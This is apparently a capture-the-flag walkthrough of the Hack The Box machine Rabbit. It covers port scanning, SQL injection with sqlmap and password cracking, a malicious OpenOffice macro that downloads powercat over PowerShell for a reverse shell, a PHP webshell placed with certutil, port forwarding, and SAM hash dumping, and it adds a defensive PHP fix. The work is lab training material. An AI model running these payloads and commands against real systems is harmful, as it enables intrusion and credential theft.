Today we are going to solve Rabbit, a retired machine from Hack The Box, a platform for online penetration-testing practice.
Level: Intermediate
Task: find user.txt and root.txt file on the victim’s machine.
Since these labs are accessible online, they have static IPs. The IP of Rabbit is 10.10.10.71, so let's start with basic nmap port enumeration.
root@kali:~/htb/rabbit# nmap -sC -sV 10.10.10.71
Starting Nmap 7.80 ( https://nmap.org ) at 2020-01-21 15:10 EST
Stats: 0:01:05 elapsed; 0 hosts completed (1 up), 1 undergoing Service Scan
Service scan Timing: About 87.50% done; ETC: 15:11 (0:00:09 remaining)
Stats: 0:03:11 elapsed; 0 hosts completed (1 up), 1 undergoing Script Scan
NSE Timing: About 95.31% done; ETC: 15:13 (0:00:02 remaining)
Nmap scan report for rabbit.htb.local (10.10.10.71)
Host is up (0.086s latency).
Not shown: 976 closed ports
PORT      STATE SERVICE       VERSION
25/tcp    open  smtp          Microsoft Exchange smtpd
| smtp-commands: Rabbit.htb.local Hello [10.10.14.7], SIZE, PIPELINING, DSN, ENHANCEDSTATUSCODES, STARTTLS, X-ANONYMOUSTLS, AUTH NTLM, X-EXPS GSSAPI NTLM, 8BITMIME, BINARYMIME, CHUNKING, XEXCH50, XRDST, XSHADOW,
|_ This server supports the following commands: HELO EHLO STARTTLS RCPT DATA RSET MAIL QUIT HELP AUTH BDAT
| smtp-ntlm-info:
|   Target_Name: HTB
|   NetBIOS_Domain_Name: HTB
|   NetBIOS_Computer_Name: RABBIT
|   DNS_Domain_Name: htb.local
|   DNS_Computer_Name: Rabbit.htb.local
|   DNS_Tree_Name: htb.local
|_  Product_Version: 6.1.7601
|_ssl-date: 2020-01-22T01:14:17+00:00; +5h01m29s from scanner time.
53/tcp    open  domain        Microsoft DNS 6.1.7601 (1DB15D39) (Windows Server 2008 R2 SP1)
| dns-nsid:
|_  bind.version: Microsoft DNS 6.1.7601 (1DB15D39)
80/tcp    open  http          Microsoft IIS httpd 7.5
|_http-server-header: Microsoft-IIS/7.5
|_http-title: 403 - Forbidden: Access is denied.
88/tcp    open  kerberos-sec  Microsoft Windows Kerberos (server time: 2020-01-22 01:12:03Z)
135/tcp   open  msrpc         Microsoft Windows RPC
389/tcp   open  ldap          Microsoft Windows Active Directory LDAP (Domain: htb.local, Site: Default-First-Site-Name)
443/tcp   open  ssl/https?
|_ssl-date: 2020-01-22T01:14:17+00:00; +5h01m29s from scanner time.
| sslv2:
|   SSLv2 supported
|   ciphers:
|     SSL2_RC4_128_WITH_MD5
|_    SSL2_DES_192_EDE3_CBC_WITH_MD5
445/tcp   open  microsoft-ds?
464/tcp   open  kpasswd5?
587/tcp   open  smtp          Microsoft Exchange smtpd
| smtp-commands: Rabbit.htb.local Hello [10.10.14.7], SIZE 10485760, PIPELINING, DSN, ENHANCEDSTATUSCODES, STARTTLS, AUTH GSSAPI NTLM, 8BITMIME, BINARYMIME, CHUNKING,
|_ This server supports the following commands: HELO EHLO STARTTLS RCPT DATA RSET MAIL QUIT HELP AUTH BDAT
| smtp-ntlm-info:
|   Target_Name: HTB
|   NetBIOS_Domain_Name: HTB
|   NetBIOS_Computer_Name: RABBIT
|   DNS_Domain_Name: htb.local
|   DNS_Computer_Name: Rabbit.htb.local
|   DNS_Tree_Name: htb.local
|_  Product_Version: 6.1.7601
|_ssl-date: 2020-01-22T01:14:17+00:00; +5h01m29s from scanner time.
593/tcp   open  ncacn_http    Microsoft Windows RPC over HTTP 1.0
636/tcp   open  ldapssl?
808/tcp   open  ccproxy-http?
3268/tcp  open  ldap          Microsoft Windows Active Directory LDAP (Domain: htb.local, Site: Default-First-Site-Name)
3269/tcp  open  globalcatLDAPssl?
3306/tcp  open  mysql         MySQL 5.7.19
| mysql-info:
|   Protocol: 10
|   Version: 5.7.19
|   Thread ID: 10
|   Capabilities flags: 63487
|   Some Capabilities: LongPassword, LongColumnFlag, SupportsCompression, DontAllowDatabaseTableColumn, Support41Auth, ConnectWithDatabase, IgnoreSigpipes, InteractiveClient, SupportsTransactions, Speaks41ProtocolOld, Speaks41ProtocolNew, IgnoreSpaceBeforeParenthesis, FoundRows, SupportsLoadDataLocal, ODBCClient, SupportsMultipleStatments, SupportsMultipleResults, SupportsAuthPlugins
|   Status: Autocommit
|   Salt: i".rs\x0Bb58A\x0D\x0E\x01[s\x0F\SKd
|_  Auth Plugin Name: mysql_native_password
6001/tcp  open  ncacn_http    Microsoft Windows RPC over HTTP 1.0
6002/tcp  open  ncacn_http    Microsoft Windows RPC over HTTP 1.0
6003/tcp  open  ncacn_http    Microsoft Windows RPC over HTTP 1.0
6004/tcp  open  ncacn_http    Microsoft Windows RPC over HTTP 1.0
6005/tcp  open  msrpc         Microsoft Windows RPC
6006/tcp  open  msrpc         Microsoft Windows RPC
6007/tcp  open  msrpc         Microsoft Windows RPC
8080/tcp  open  http          Apache httpd 2.4.27 ((Win64) PHP/5.6.31)
| http-methods:
|_  Potentially risky methods: TRACE
|_http-server-header: Apache/2.4.27 (Win64) PHP/5.6.31
|_http-title: Example
Service Info: Host: RABBIT; OS: Windows; CPE: cpe:/o:microsoft:windows, cpe:/o:microsoft:windows_server_2008:r2:sp1

Host script results:
|_clock-skew: mean: 5h01m29s, deviation: 0s, median: 5h01m28s
|_smb2-time: Protocol negotiation failed (SMB2)

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 339.55 seconds
root@kali:~/htb/rabbit# gobuster -e -k -u http://10.10.10.71:8080 -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -t 20
=====================================================
Gobuster v2.0.1              OJ Reeves (@TheColonial)
=====================================================
[+] Mode         : dir
[+] Url/Domain   : http://10.10.10.71:8080/
[+] Threads      : 20
[+] Wordlist     : /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt
[+] Status codes : 200,204,301,302,307,403
[+] Expanded     : true
[+] Timeout      : 10s
=====================================================
2019/05/13 10:30:07 Starting gobuster
=====================================================
http://10.10.10.71:8080/index (Status: 200)
http://10.10.10.71:8080/Index (Status: 200)
http://10.10.10.71:8080/favicon (Status: 200)
http://10.10.10.71:8080/%!(NOVERB) (Status: 403)
http://10.10.10.71:8080/INDEX (Status: 200)
http://10.10.10.71:8080/joomla (Status: 301)
http://10.10.10.71:8080/*checkout* (Status: 403)
http://10.10.10.71:8080/complain (Status: 301)
Under /complain we find a Complain Management System.
root@kali:~/htb/rabbit# searchsploit 'complain management system'
-------------------------------------------------------------------------- ----------------------------------------
 Exploit Title                                                            |  Path (/usr/share/exploitdb/)
-------------------------------------------------------------------------- ----------------------------------------
Complain Management System - Hard-Coded Credentials / Blind SQL injection | exploits/php/webapps/42968.txt
Complain Management System - SQL injection                                | exploits/php/webapps/41131.txt
root@kali:~/htb/rabbit# cat /usr/share/exploitdb/exploits/php/webapps/42968.txt
# Exploit Title : Complain Management System Blind SQL Injection
# Date: 10 October 2017
# Exploit Author: havysec
# Tested on: ubuntu14.04
# Vendor: https://sourceforge.net/projects/complain-management-system/
# Version: not supplied
# Download Software: https://sourceforge.net/projects/complain-management-system/files

## About The Product :
Complain Management is a Web based project used to manage Customer's complain Online. User can login, and Create complain, view complain details and track the status of its complain.

## Vulnerability :
The functions.php file line 88 has hardcoded admin credentials.

elseif($uType == 'admin'){
    //$_SESSION['user_id'] = $row['sid'];
    if($userName == 'admin' && $password == 'admin123'){
        $_SESSION['user_id'] = 0;
        $_SESSION['user_name'] = 'Administrator';
        $_SESSION['user_type'] = 'admin';
        header('Location: '.WEB_ROOT.'index.php');
        exit;

Using the hardcoded admin credentials we then have access to the view.php file that is vulnerable to Blind SQL injection.
As we read, the first step is to register as 'Customer' and then use that session's PHPSESSID cookie with sqlmap to gain access to the databases.
c:\SQLMAP>type rabbit.req
POST /complain/process.php?action=assignComplain HTTP/1.1
Host: 10.10.10.71:8080
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:66.0) Gecko/20100101 Firefox/66.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: nl,en-US;q=0.7,en;q=0.3
Accept-Encoding: gzip, deflate
Referer: http://10.10.10.71:8080/complain/view.php?mod=admin&view=viewByCompID&compId=10
Content-Type: application/x-www-form-urlencoded
Content-Length: 53
Connection: close
Cookie: PHPSESSID=82k6csju4c0ccdepcbnan5k602
Upgrade-Insecure-Requests: 1

compId=10&compDesc=&engId=6&btnLogin=+Assing+Complain+

c:\SQLMAP>
c:\SQLMAP>python sqlmap.py -r rabbit.req --dbms=mysql -p "compId" --risk=3 --level=3 --batch -D secret --dump
        ___
       __H__
 ___ ___[(]_____ ___ ___  {1.2.11.19#dev}
|_ -| . [)]     | .'| . |
|___|_  [']_|_|_|__,|  _|
      |_|V          |_|   http://sqlmap.org

[!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program

[*] starting @ 15:16:49 /2019-05-15/

[15:16:49] [INFO] parsing HTTP request from 'rabbit.req'
[15:16:49] [INFO] testing connection to the target URL
sqlmap got a 302 redirect to 'http://10.10.10.71:8080/complain/view.php?mod=admin&view=compDetails'. Do you want to follow? [Y/n] Y
redirect is a result of a POST request. Do you want to resend original POST data to a new location? [Y/n] Y
[15:16:50] [INFO] heuristics detected web page charset 'ISO-8859-2'
[15:16:50] [INFO] checking if the target is protected by some kind of WAF/IPS
[15:16:50] [INFO] testing if the target URL content is stable
[15:16:51] [INFO] heuristic (basic) test shows that POST parameter 'compId' might be injectable (possible DBMS: 'MySQL')
[15:16:51] [INFO] testing for SQL injection on POST parameter 'compId'
for the remaining tests, do you want to include all tests for 'MySQL' extending provided level (3) value? [Y/n] Y
--snip--
do you want to crack them via a dictionary-based attack? [Y/n/q] Y
[15:18:21] [INFO] using hash method 'md5_generic_passwd'
what dictionary do you want to use?
[1] default dictionary file 'c:\SQLMAP\txt\wordlist.zip' (press Enter)
[2] custom dictionary file
[3] file with list of dictionary files
> 1
[15:18:21] [INFO] using default dictionary
do you want to use common password suffixes? (slow!) [y/N] N
[15:18:21] [INFO] starting dictionary-based cracking (md5_generic_passwd)
[15:18:21] [INFO] starting 4 processes
[15:18:25] [INFO] cracked password 'barcelona' for user 'Malek'
[15:18:31] [INFO] cracked password 'popcorn' for user 'Dumah'
[15:18:32] [INFO] cracked password 'santiago' for user 'Moebius'
[15:18:56] [INFO] cracked password 'pussycatdolls' for user 'Ariel'
Database: secret
Table: users
[10 entries]
+----------+--------------------------------------------------+
| Username | Password                                         |
+----------+--------------------------------------------------+
| Zephon   | 13fa8abd10eed98d89fd6fc678afaf94                 |
| Kain     | 33903fbcc0b1046a09edfaa0a65e8f8c                 |
| Dumah    | 33da7a40473c1637f1a2e142f4925194 (popcorn)       |
| Magnus   | 370fc3559c9f0bff80543f2e1151c537                 |
| Raziel   | 719da165a626b4cf23b626896c213b84                 |
| Moebius  | a6f30815a43f38ec6de95b9a9d74da37 (santiago)      |
| Ariel    | b9c2538d92362e0e18e52d0ee9ca0c6f (pussycatdolls) |
| Turel    | d322dc36451587ea2994c84c9d9717a1                 |
| Dimitri  | d459f76a5eeeed0eca8ab4476c144ac4                 |
| Malek    | dea56e47f1c62c30b83b70eb281a6c39 (barcelona)     |
+----------+--------------------------------------------------+

[15:19:04] [INFO] table 'secret.users' dumped to CSV file 'C:\Users\jacco\.sqlmap\output\10.10.10.71\dump\secret\users.csv'
[15:19:04] [INFO] fetched data logged to text files under 'C:\Users\jacco\.sqlmap\output\10.10.10.71'

[*] ending @ 15:19:04 /2019-05-15/
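Both weaknesses that got us here, the hardcoded admin check quoted from functions.php and the compId parameter that sqlmap just injected, together with the unsalted MD5 digests it cracked in seconds, can be closed in a few lines. The following is an added hardening example written for this page, not code from the Complain Management System or from the writeup; it assumes PHP 7.4+, session_start() already called, an existing PDO handle to the secret database, and a Role column plus a complaints table (with engId/status columns) that the real project may not have under those names.

```php
<?php
// Added hardening example, not code from the Complain Management System or
// from the writeup. Assumes session_start() has run, $pdo is a PDO handle to
// the 'secret' database, the users table has the Username/Password columns
// seen in the sqlmap dump plus sid (from the exploit text), and a Role column
// (assumed) so the admin account lives in the database like every other user.

const LEGACY_MD5 = '/^[0-9a-f]{32}$/';

// Replaces the functions.php check `$userName == 'admin' && $password == 'admin123'`:
// no hardcoded account, lookup through a prepared statement, password_verify,
// and transparent upgrade of the unsalted MD5 digests sqlmap cracked in seconds.
function login(PDO $pdo, string $userName, string $password): ?array
{
    static $dummyHash = null;
    $dummyHash ??= password_hash('dummy', PASSWORD_DEFAULT);

    $stmt = $pdo->prepare('SELECT sid, Username, Password, Role FROM users WHERE Username = ?');
    $stmt->execute([$userName]);
    $row = $stmt->fetch(PDO::FETCH_ASSOC);
    if ($row === false) {
        password_verify($password, $dummyHash); // same cost as a real check: no username enumeration by timing
        return null;
    }

    $stored = $row['Password'];
    if (preg_match(LEGACY_MD5, $stored)) {
        // Legacy row still holding an unsalted MD5: verify once, then replace it with bcrypt.
        if (!hash_equals($stored, md5($password))) {
            return null;
        }
        $pdo->prepare('UPDATE users SET Password = ? WHERE sid = ?')
            ->execute([password_hash($password, PASSWORD_DEFAULT), $row['sid']]);
    } elseif (!password_verify($password, $stored)) {
        return null;
    }

    session_regenerate_id(true);              // fresh PHPSESSID once privileges change
    $_SESSION['user_id']   = (int) $row['sid'];
    $_SESSION['user_name'] = $row['Username'];
    $_SESSION['user_type'] = $row['Role'];    // 'admin' comes from the database, not a literal
    return $row;
}

// Replaces process.php?action=assignComplain, where compId went straight into
// the query: authorisation check, integer validation, prepared statement.
// The complaints table and its engId/status columns are assumed names.
function assignComplain(PDO $pdo, array $post): bool
{
    if (($_SESSION['user_type'] ?? '') !== 'admin') {
        http_response_code(403);
        return false;
    }
    $compId = filter_var($post['compId'] ?? '', FILTER_VALIDATE_INT, ['options' => ['min_range' => 1]]);
    $engId  = filter_var($post['engId']  ?? '', FILTER_VALIDATE_INT, ['options' => ['min_range' => 1]]);
    if ($compId === false || $engId === false) {
        http_response_code(400);              // anything that is not a plain integer never reaches MySQL
        return false;
    }
    $stmt = $pdo->prepare('UPDATE complaints SET engId = ?, status = ? WHERE compId = ?');
    return $stmt->execute([$engId, 'assigned', $compId]);
}
```

With the users table rehashed this way, a dump like the one above yields bcrypt strings that sqlmap's dictionary pass cannot crack in seconds, and the admin account becomes a normal row that can be rotated.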
Exploitation
Where do we use the obtained credentials now? Let's try them in
https://10.10.10.71/owa
We use found valid credentials:
Ariel:pussycatdolls
Once logged in to /owa, the first thing to do is check the mails:
As we read in these emails, we could use a malicious OpenOffice document to get a shell, keeping in mind the PowerShell constraint and Windows Defender.
In metasploit there’s an exploit that could work:
exploit/multi/misc/openoffice_document_macro
We rename the obtained file to .zip and edit the macro, replacing the payload with:
powershell.exe IEX (New-Object System.Net.Webclient).DownloadString('http://10.10.14.20/powercat.ps1');powercat -c 10.10.14.20 -p 1234 -e cmd
powershell.exe -version 2 IEX (New-Object System.Net.Webclient).DownloadString('http://10.10.14.20/powercat.ps1');powercat -c 10.10.14.20 -p 1234 -e cmd
Sub Exploit
    Shell("cmd.exe /C ""powershell.exe -version 2 IEX (New-Object System.Net.Webclient).DownloadString('http://10.10.14.7/powercat.ps1');powercat -c 10.10.14.7 -p 1234 -e cmd;""")
End Sub
Send an email to all, containing our malicious .odt file:
Two years later, the answer to resolving headaches with attachments in Outlook Web Access (OWA) remains unchanged: Use Internet Explorer, not Edge, not Chrome, not Firefox.
And now we wait for it to be executed by a user. (This takes approx. 7 minutes; if nothing happens after 10, reset the box.)
root@kali:~/htb# python3 -m http.server 80
Serving HTTP on 0.0.0.0 port 80 (http://0.0.0.0:80/) ...
10.10.10.71 - - [21/Jan/2020 14:25:45] "GET /powercat.ps1 HTTP/1.1" 200
root@kali:~/htb/rabbit# rlwrap nc -nlvp 1234
listening on [any] 1234 ...
connect to [10.10.14.7] from (UNKNOWN) [10.10.10.71] 43040
Microsoft Windows [Version 6.1.7601]
Copyright (c) 2009 Microsoft Corporation.  All rights reserved.

C:\Program Files (x86)\OpenOffice 4\program>whoami
whoami
htb\raziel

C:\Program Files (x86)\OpenOffice 4\program>type c:\users\raziel\desktop\user.txt
type c:\users\raziel\desktop\user.txt
c6f45142bea818fe729cef32342aae9c

C:\Program Files (x86)\OpenOffice 4\program>
Post-Exploitation
c:\>dir wamp64
dir wamp64
 Volume in drive C has no label.
 Volume Serial Number is AEA8-5415

 Directory of c:\wamp64

10/28/2017  11:13 AM    <DIR>          .
10/28/2017  11:13 AM    <DIR>          ..
10/28/2017  12:19 PM    <DIR>          alias
10/28/2017  11:13 AM    <DIR>          apps
12/31/2010  09:39 AM             4,790 barimage.bmp
10/28/2017  11:15 AM    <DIR>          bin
10/28/2017  11:13 AM    <DIR>          cgi-bin
01/08/2017  10:13 AM            28,470 images_off.bmp
01/08/2017  10:13 AM            28,470 images_on.bmp
09/01/2017  04:30 PM             3,978 install-english.txt
10/28/2017  11:13 AM    <DIR>          lang
11/06/2015  11:00 AM             8,156 license-english.txt
10/28/2017  11:18 AM    <DIR>          logs
09/01/2017  09:44 AM             5,741 mariadb_support_en.txt
09/01/2017  04:20 PM             1,289 read_after_install-english.txt
10/28/2017  11:13 AM    <DIR>          scripts
05/13/2019  12:44 PM    <DIR>          tmp
10/28/2017  11:16 AM         4,038,372 unins000.dat
10/28/2017  11:13 AM         1,401,105 unins000.exe
10/28/2017  11:13 AM               185 uninstall_services.bat
10/29/2017  10:32 PM             2,086 wampmanager.conf
09/03/2008  03:46 PM         1,233,408 wampmanager.exe
11/16/2017  07:57 PM           546,316 wampmanager.ini
08/30/2017  09:28 AM            29,431 wampmanager.tpl
05/13/2019  01:56 PM    <DIR>          www
              14 File(s)      7,331,797 bytes
              11 Dir(s)  25,699,479,552 bytes free

c:\>
We see that the web service on port 8080 is served by WampServer (wamp64). Sometimes this service runs as SYSTEM, in which case any PHP file we can write into its web root executes with SYSTEM privileges.
Let's see whether we have write permissions and who is running it:
c:\>cacls wamp64
cacls wamp64
c:\wamp64 NT AUTHORITY\SYSTEM:(OI)(CI)(ID)F
          BUILTIN\Administrators:(OI)(CI)(ID)F
          BUILTIN\Users:(OI)(CI)(ID)R
          BUILTIN\Users:(CI)(ID)(special access:)
                                FILE_APPEND_DATA
          BUILTIN\Users:(CI)(ID)(special access:)
                                FILE_WRITE_DATA
          CREATOR OWNER:(OI)(CI)(IO)(ID)F

c:\>
BUILTIN\Users can create files here, and the (CI) flag means the right is inherited by subdirectories such as www. Let's upload a PHP webshell:
c:\Python37>type puckie.php
<?php echo shell_exec($_GET["cmd"]); ?>
c:\Python37>python -m http.server 80
Serving HTTP on 0.0.0.0 port 80 (http://0.0.0.0:80/) ...
10.10.10.71 - - [13/May/2019 14:45:17] "GET /powercat.ps1 HTTP/1.1" 200 -
10.10.10.71 - - [13/May/2019 14:57:26] "GET /puckie.php HTTP/1.1" 200 -
c:\Users\Raziel\Desktop>certutil -urlcache -split -f http://10.10.14.20/puckie.php c:\wamp64\www\puckie.php
certutil -urlcache -split -f http://10.10.14.20/puckie.php c:\wamp64\www\puckie.php
****  Online  ****
  0000  ...
  002c
CertUtil: -URLCache command completed successfully.
c:\Users\jacco>curl http://10.10.10.71:8080/puckie.php?cmd=whoami
nt authority\system
root.txt = 0b2ded66e5a49dd1620be30110f43d54
Now we can read the flag and even get a shell as SYSTEM easily.
root@kali#curl http://10.10.10.71:8080/puckie.php?cmd=powershell.exe%20-version%202%20IEX%20(New-Object%20System.Net.Webclient).DownloadString(%27http://10.10.14.7/powercat.ps1%27);powercat%20-c%2010.10.14.7%20-p%20443%20-e%20cmd
root@kali:~/htb/rabbit# rlwrap nc -nlvp 443
listening on [any] 443 ...
connect to [10.10.14.7] from (UNKNOWN) [10.10.10.71] 29105
Microsoft Windows [Version 6.1.7601]
Copyright (c) 2009 Microsoft Corporation.  All rights reserved.

C:\wamp64\www>whoami
whoami
nt authority\system

C:\wamp64\www>
Just for Fun
root@kali:~/htb/rabbit# curl http://10.10.10.71:8080/puckie.php?cmd=netstat%20-p%20TCP%20%20-a

Active Connections

  Proto  Local Address          Foreign Address        State
  TCP    0.0.0.0:25             Rabbit:0               LISTENING
  TCP    0.0.0.0:80             Rabbit:0               LISTENING
  TCP    0.0.0.0:88             Rabbit:0               LISTENING
  TCP    0.0.0.0:135            Rabbit:0               LISTENING
  TCP    0.0.0.0:389            Rabbit:0               LISTENING
  TCP    0.0.0.0:443            Rabbit:0               LISTENING
  TCP    0.0.0.0:445            Rabbit:0               LISTENING
  TCP    0.0.0.0:464            Rabbit:0               LISTENING
  TCP    0.0.0.0:587            Rabbit:0               LISTENING
  TCP    0.0.0.0:593            Rabbit:0               LISTENING
  TCP    0.0.0.0:636            Rabbit:0               LISTENING
  TCP    0.0.0.0:808            Rabbit:0               LISTENING
  TCP    0.0.0.0:3268           Rabbit:0               LISTENING
  TCP    0.0.0.0:3269           Rabbit:0               LISTENING
  TCP    0.0.0.0:3306           Rabbit:0               LISTENING
  TCP    0.0.0.0:5722           Rabbit:0               LISTENING
  TCP    0.0.0.0:5985           Rabbit:0               LISTENING
  TCP    0.0.0.0:6001           Rabbit:0               LISTENING
  TCP    0.0.0.0:6002           Rabbit:0               LISTENING
  TCP    0.0.0.0:6003           Rabbit:0               LISTENING
  TCP    0.0.0.0:6004           Rabbit:0               LISTENING
  TCP    0.0.0.0:6005           Rabbit:0               LISTENING
  TCP    0.0.0.0:6006           Rabbit:0               LISTENING
  TCP    0.0.0.0:6007           Rabbit:0               LISTENING
  TCP    0.0.0.0:6008           Rabbit:0               LISTENING
  TCP    0.0.0.0:6010           Rabbit:0               LISTENING
  TCP    0.0.0.0:6011           Rabbit:0               LISTENING
  TCP    0.0.0.0:6019           Rabbit:0               LISTENING
  TCP    0.0.0.0:6144           Rabbit:0               LISTENING
  TCP    0.0.0.0:8080           Rabbit:0               LISTENING
  TCP    0.0.0.0:9389           Rabbit:0               LISTENING
  TCP    0.0.0.0:17914          Rabbit:0               LISTENING
  TCP    0.0.0.0:22039          Rabbit:0               LISTENING
  TCP    0.0.0.0:22050          Rabbit:0               LISTENING
  TCP    0.0.0.0:22093          Rabbit:0               LISTENING
  TCP    0.0.0.0:22102          Rabbit:0               LISTENING
  TCP    0.0.0.0:22116          Rabbit:0               LISTENING
  TCP    0.0.0.0:22126          Rabbit:0               LISTENING
  TCP    0.0.0.0:22156          Rabbit:0               LISTENING
  TCP    0.0.0.0:22161          Rabbit:0               LISTENING
  TCP    0.0.0.0:22174          Rabbit:0               LISTENING
  TCP    0.0.0.0:22179          Rabbit:0               LISTENING
  TCP    0.0.0.0:22187          Rabbit:0               LISTENING
  TCP    0.0.0.0:22202          Rabbit:0               LISTENING
  TCP    0.0.0.0:22211          Rabbit:0               LISTENING
  TCP    0.0.0.0:22231          Rabbit:0               LISTENING
  TCP    0.0.0.0:22253          Rabbit:0               LISTENING
  TCP    0.0.0.0:47001          Rabbit:0               LISTENING
  TCP    0.0.0.0:64327          Rabbit:0               LISTENING
  TCP    0.0.0.0:64337          Rabbit:0               LISTENING
  TCP    10.10.10.71:53         Rabbit:0               LISTENING
  TCP    10.10.10.71:8080       10.10.14.7:44038       ESTABLISHED
  TCP    10.10.10.71:29105      10.10.14.7:https       ESTABLISHED
  TCP    10.10.10.71:43040      10.10.14.7:1234        ESTABLISHED
  TCP    127.0.0.1:53           Rabbit:0               LISTENING
root@kali:~/htb/rabbit#
Port 5985 (WinRM) is listening but was not among the ports nmap could reach from outside, so we use plink's -R to forward it back over SSH to our Kali machine and connect to it locally:

root@kali:~/htb# rlwrap nc -nlvp 1234
listening on [any] 1234 ...
connect to [10.10.14.7] from (UNKNOWN) [10.10.10.71] 36031
Microsoft Windows [Version 6.1.7601]
Copyright (c) 2009 Microsoft Corporation.  All rights reserved.

C:\wamp64\www>certutil -urlcache -split -f http://10.10.14.7/plink.exe c:\windows\system32\spool\drivers\color\plink.exe
certutil -urlcache -split -f http://10.10.14.7/plink.exe c:\windows\system32\spool\drivers\color\plink.exe
****  Online  ****
  000000  ...
  04c000
CertUtil: -URLCache command completed successfully.

C:\wamp64\www>cd c:\windows\system32\spool\drivers\color
cd c:\windows\system32\spool\drivers\color

c:\Windows\System32\spool\drivers\color>.\plink.exe -R 5985:127.0.0.1:5985 10.10.14.7
.\plink.exe -R 5985:127.0.0.1:5985 10.10.14.7
login as: puck
puck@10.10.14.7's password: iestyle
Linux kali 4.19.0-kali1-amd64 #1 SMP Debian 4.19.13-1kali1 (2019-01-03) x86_64
Last login: Thu Jan 16 06:33:03 2020 from 10.10.10.167
Could not chdir to home directory /home/puck: No such file or directory
$
root@kali:/opt/evil-winrm# ./evil-winrm.rb -i HTB.LOCAL -u puck -p 'IEstyle'

Info: Starting Evil-WinRM shell v1.6

Info: Establishing connection to remote endpoint

*Evil-WinRM* PS C:\Users\puck\Documents> whoami
htb\puck
*Evil-WinRM* PS C:\Users\puck\Documents> hostname
Rabbit
Get those hashes
root@kali:~/htb# python3 -m http.server 80
Serving HTTP on 0.0.0.0 port 80 (http://0.0.0.0:80/) ...
10.10.10.71 - - [21/Jan/2020 15:21:07] "GET /CQHashDumpv2.exe HTTP/1.1" 200 -
10.10.10.71 - - [21/Jan/2020 15:21:08] "GET /CQHashDumpv2.exe HTTP/1.1" 200 -
c:\Users\Public>certutil -urlcache -split -f http://10.10.14.7/CQHashDumpv2.exe c:\users\public\cq.exe
certutil -urlcache -split -f http://10.10.14.7/CQHashDumpv2.exe c:\users\public\cq.exe
****  Online  ****
  000000  ...
  015000
CertUtil: -URLCache command completed successfully.

c:\Users\Public>cq.exe
cq.exe
cq by Michal Grzegorzewski, mgrzeg@cqure.pl

Usage: cq /samdump /dccdump /sam /sec /sys

Available parameters:
      --samdump              Dump hashes from the SAM database
      --dccdump              Dump Domain Cached Credentials
      --sam=VALUE            Path to the SAM reg file
      --sec=VALUE            Path to the SECURITY reg file
      --sys=VALUE            Path to the SYSTEM reg file
      --newmsdcc=VALUE       Binary string with new MSDCC2
      --pass=VALUE           New password
      --user=VALUE           User name for new MSDCC2

Providing any: /sam /sec or /sys switch enables offline analysis.
In offline mode /samdump enforces /sam and /sys, and /dccdump enforces /sys and /sec.
Online mode requires access to the SECURITY registry, which by default is accessible only by the SYSTEM account.

Credits
Offline registry parser based on the TheWindowsNTRegistryFileFormat by Timothy D.Morgan.
Interesting registry entries, calculations from the CredDump7 toolkit.
Argument parsing by NDesk.Options.

c:\Users\Public>cq.exe --samdump
cq.exe --samdump
SAM hashes:
Administrator:500:aad3b435b51404eeaad3b435b51404ee:edbc4b98df3bb5d9fca20d0d759f62c6:::
Guest:501:aad3b435b51404eeaad3b435b51404ee:edbc4b98df3bb5d9fca20d0d759f62c6:::

c:\Users\Public>
Author: Puckiestyle
Reference used : https://ironhackers.es/en/writeups/writeup-rabbit-hackthebox/